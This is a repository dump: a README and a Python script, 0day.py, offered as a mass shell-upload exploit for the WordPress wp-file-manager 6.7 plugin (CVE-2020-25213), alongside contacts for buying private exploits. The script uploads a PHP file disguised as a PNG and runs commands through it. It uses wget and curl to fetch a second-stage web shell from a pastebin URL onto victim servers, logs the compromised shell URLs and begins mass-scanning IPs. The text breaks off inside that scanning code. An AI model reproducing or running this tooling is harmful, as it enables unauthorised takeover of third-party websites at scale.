├── README.md
└── 0day.py
/README.md:
--------------------------------------------------------------------------------
1 | ## Zero-Day Vulnerability in File Manager Plugin 6.7 ( CVE 2020-25213 )
2 | Exploit : Mass 0Day Shell Upload - wp-file-manager 6.7
3 |
4 |
5 |
6 | Installation :
7 | ------
8 |
9 |
10 | - How To Use ?
11 |
12 | python3 0day.py
13 |
14 |
15 | 📧 Contact :
16 | ------
17 | You Want Ask About All My Tools Or Buy Tools/Exploits Private Add Me On :
18 | ```
19 | [+] Email : aron.tn.official@gmail.com
20 | [+] facebook : https://www.facebook.com/Aron.Tn
21 | [+] ICQ: @aron_tn
22 | [+] Telegram : @aron_tn
23 | ```
24 |
25 |
©2020 Aron-Tn
26 |
--------------------------------------------------------------------------------
/0day.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # from https://github.com/w4fz5uck5/wp-file-manager-0day
3 | # from https://github.com/0xtn/0day-elFinder-2020
4 | import requests
5 | import os
6 | import sys
7 | import concurrent.futures
8 | import threading
9 | import socket
10 | import re
11 | from sys import platform
12 | if not os.path.exists('AronTn-exp'):
13 | os.makedirs('AronTn-exp')
14 | if platform == "linux" or platform == "linux2":
15 | os.system('clear')
16 | elif platform == "win32":
17 | os.system('cls')
18 | t = []
19 | linko = "https://pastebin.com/raw/vF010g4t"
20 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0"}
21 | def uploadshell(i):
22 | m = 'wget ' + linko + ' -O AronTn.php'
23 | m2 = 'curl -O ' + linko + ';mv EiKvkrJp exploixtn.php'
24 | burp0_url = "%s/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=%s" % (i, m)
25 | burp0_url2 = "%s/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=%s" % (i, m2)
26 | burp0_headers = {"User-Agent": "curl/7.68.0", "Accept": "*/*", "Expect": "100-continue", "Connection": "close"}
27 | r = requests.get(burp0_url, headers=burp0_headers).content
28 | r2 = requests.get(burp0_url2, headers=burp0_headers).content
29 | if b'\x89PNG\r\n\x1a' in r:
30 | print("\033[92m[+] Upload 2.1 .. Done\n SHELL : %s/wp-content/plugins/wp-file-manager/lib/files/AronTn.php" % i)
31 | open('AronTn-exp/shells1.txt', 'a').write(i + "/wp-content/plugins/wp-file-manager/lib/files/AronTn.php\n")
32 | if b'\x89PNG\r\n\x1a' in r2:
33 | print("\033[92m[+] Upload 2.2 .. Done\n SHELL : %s/wp-content/plugins/wp-file-manager/lib/files/AronxTn.php" % i)
34 | open('AronTn-exp/shells2.txt', 'a').write(i + "/wp-content/plugins/wp-file-manager/lib/files/AronxTn.php\n")
35 | def wp(i):
36 | if 'jQuery Foundation' in requests.get(i + "/wp-includes/js/jquery/jquery.js").text:
37 | return True
38 | if '/wp-inclues/' in requests.get(i).text or '/wp-content' in requests.get(i).text:
39 | return True
40 | else:
41 | return False
42 | def exploit(i):
43 | try:
44 | if wp(i):
45 | print("\033[93m" + i + " ==> Wordpress ")
46 | open('AronTn-exp/wordpress.txt', 'a').write(i + '\n')
47 | shell = i + "/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=uname -a"
48 | burp0_url = "%s/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" % i
49 | burp0_headers = {"User-Agent": "curl/7.68.0", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------66e3ca93281c7050", "Expect": "100-continue", "Connection": "close"}
50 | burp0_data = "--------------------------66e3ca93281c7050\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n--------------------------66e3ca93281c7050\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n--------------------------66e3ca93281c7050\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"x.php\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01^\x00\x00\x01^\x04\x03\x00\x00\x00?\x05j)\x00\x00\x00\x1ePLTE\xff\xff\xff\xef\xef\xef\xe5\xe5\xe5\xce\xce\xce\xa1\xa1\xa1iiiVVVGGG333\x00\x00\x00g\x00\xcc\xe2\x00\x00\r\xc0IDATx\xda\xed]K[\xdb\xc8\x12m\xc9\xce^\xc6\x90\xbb58\t\xdc\x9dm\x9c\t\xd9\xd9X\x1e\xc2\x8e\x87I\xc22\t!\x93\xe5@xmc\x02\xf1\xda\x0f\xa9\xff\xed]`\xeb\xddVU\xc9C\xb5\xe6\xa2-\xd4\xa7\xf2Q\xe9\xa8\x1fuN\x8b\xdf\xb9\xba\xee\x84\xbc\"^\xd7\x83\xc7\x8f\xbc\x9a\x08\xa7\xb1F\xbb\xaa\x97\xf4\xc8:5\xf2^L,A\xbb\x8cSr\xe4\x055\xd2\xbc\x17\x0eC\xbe\xe4H\xf3NL*\x8f\x8f\xd2i\xbe\xf05Y\xf05\xffM\xf5[*\x95J\xb9\xc1\xb7\xdc\xb4\x8f\xde\x9f\x1e\xf5\xec\x86\x95\x83\xfa\xadv\xff\x92\xd3\xcb\xfd\xba]\xd1\x86\x1f\x92Q2\xeck\x19\xb8\xdc\x93FB\xa4>\xf5[\xde\x91\x91k\xd2\xd1\x18\xdf\xeaG\x19\xbb\xdcCK\xd7\xfa-\x97\x12\x90\xb0.\xfcP>\x9629a-\xf9\xd7\xdc\x95\x8a\xcb\xdd\xd6\x11\xdf\x1d\xa9\xbc&5\xfd\xea\xf7\xe5@\x9d\xaf\xbc\xad\xe8\xc6\x0f\x85c9\xef:\xd0\x8c\x8d\x9d\xb9\xe9J\xa7\xa6\x17\xbe\xcb\x83\xf9\xf9\xca[\xad\xea\xd7\xd8MIW\xba-\x9d\xf8\xe1\x85L\xbdn-}\xf87\x1d^)eK\x1f|\x97\x01\xe9\xfa\x15\xcc_\xbf\x10x\xa5[\xd3\x85\x1f\n\x03H\xbe\xf2\\\x17\xfe}\x03JW\x8e+z\xe0k\x1c\xc3\xf2\x95m=\xea\xb7\x08LW\x8e\xf4\xe0\x87-h\xbe\xd3{1\xf3\xaf\t-\x07)\xf7t\xc0\x17\\\x0eR\xf6u\xa8\xdfux\xbe\x0f\x8b\xb7\xbc\xfc\x00\xfa\x16\x87\xbe\xc9\xbc\xfc\x0b\xfcX<\\\x9f\xf8\xf1E\x94\xef\x94\xd1x\xeb\xf7\r&\xdf\xb1\xc5\xce\x0f\x98\xf2\x95\xb2\xc6\xcd\xbf\xc6wT\xbe\xfb\xdc\xf8\x16P\xe9\xca\x9f\xdc\xf5\xbb\x8c\xcbw\xc4\xcd\x0f\x1b\xb8|\xc7\x163\xff\xbe\xc5\xe5\xeb\xd6x\xf15p\xf4 e\x8b\xb7~\x91\xf4 e\x9b\x97\x1f\xcc\x012\xdf\xbfy\xf9\x17IgR\xf6y\xf1]\xc6\xe6;\xe4\xad\xdfg\xd8|G\x16+?\xac`\xf3\x1d\xf3\xf2\xef::_^|\xb7\xb0\xf9:\x16k\xfd\xbe\xc5\xe6\xebV\xb2\xf0Yf|\xf1\xf9\xd6X\xf1\xc5~\x8e\xa5\xcc\x19\xbe2o\xf8\xd6\x84q\xc9\x87/%_\xf3k\x8e\xf8![=<>\xbe\xcc\xfc@\xe13\xce\xef\x1b\xe5{\xc1\x89\xef\x066\xdf\t/\xffR\xc6;\x9c\xf8\xaeP\xc6\xbf\x8c\xf8\xe2\xc7\xeb\xbc\xf3\x8b\"z>\xc4\x8b\xef#\xcf73\xe3\x8b\x9e\xcf\x12\xac\xf8\x1a\xc7\xc8|\x99\xd7w\x04a=\x8a\x13_\xf4z_\x85\x19\xdfW\xf8\xf5T\xce\xf1/e\xbd\x9as\xfc\x8b%\xb43\xc1\x8c/\x92 \xf6\xd8\xf7\xe7\xf1\xfbY\xbc\xfbo\xaf\xb0\xaf\x1b\xf3\xfe&j\x041\x14\xec\xfb\xc7\xe6\r\"\xdf\x03\xc1\xdf\x1f\xb5\x8b,_\xee\xfe(D\x01?tt1\xf7\x97\x83\x1f\xde\xd3\xf7\xed\xe9\xfb\xf6\xf4}\x8b\xfcimssss\xcd\xcaE\xfd\x1ae\xfb\xfd\xf5@J\xf7\xfe\xc8n\xe8?\xfe-\x07\xad\xf4\xeez\xab\xda\xe0\x9b<\xbfhF\x16/~u,\x8d\xf15^\x0f\xe26o\x15m\xeb\xd7\xf83ie(\xb6\x18\xa0\x0b?$\xa7+e\xcf\xd2\x92\r\xe5Rl\xc4\xaaP\x13|\xd5\xd6t\xee\xbe\x86\xf5[\x9c\xb3\x9d\xeb\xd4\xb5\xe3\x07s\xeef\xe3\xa8\xa2\x1b\xff\xbe\x9e\xbf\xb3t\xa8\x19\xbei\x9b\xfbA/H\x1d\xea\xf7\x1d|#W\x07~H\xdf\xda\x0f:\xff\xf1\xf3/\xa0u\xe2V#|!\x9d\x13>\xc0\xfc\xf5\xfbN\xa2:=\xb8\xf9\x01\xd6\xf9\xe3\xf5\"\xb0\xf3/\xb0\xf7\xf2\xb3&\xf8B\x9b\xc9\xc7\x96\x1e\xf5\x0b\xee\x0cl\xe9\r\n--------------------------66e3ca93281c7050--\r\n"
51 | requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
52 | if 'windows' in str(requests.get(shell).text).lower() or 'linux' in str(requests.get(shell).text).lower():
53 | print("\033[92m[+] Upload 1 .. Done")
54 | open('AronTn-exp/plugin-founded.txt', 'a').write(shell+"\n")
55 | uploadshell(i)
56 | else:
57 | print("\033[91m" + i + " ==> Not Wordpress or invalid plugin")
58 | pass
59 | except:
60 | pass
61 | def fassa5(i):
62 | if not 'http://' in i and not 'https://' in i:
63 | i = i + 'http://'
64 | exploit(i)
65 | def sitfn(ip):
66 | try :
67 | ip = ip.replace('\n', '').replace('\r', '')
68 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
69 | sock.settimeout(5)
70 | result = sock.connect_ex((ip, 80))
71 | if str(result) == '0':
72 | print("\033[92m[+] Live IP: "+ip)
73 | open("AronTn-exp/LiveIps.txt", "a").write(ip + "\n")
74 | bo = []
75 | lonk = 1
76 | while lonk < 299:
77 | bingung = "http://www.bing.com/search?q=IP%3A"+ip+"+&count=50&first="+str(lonk)
78 | iyagw = requests.get(bingung,verify=False,headers=headers)
79 | gans = iyagw.content
80 | ya = re.findall('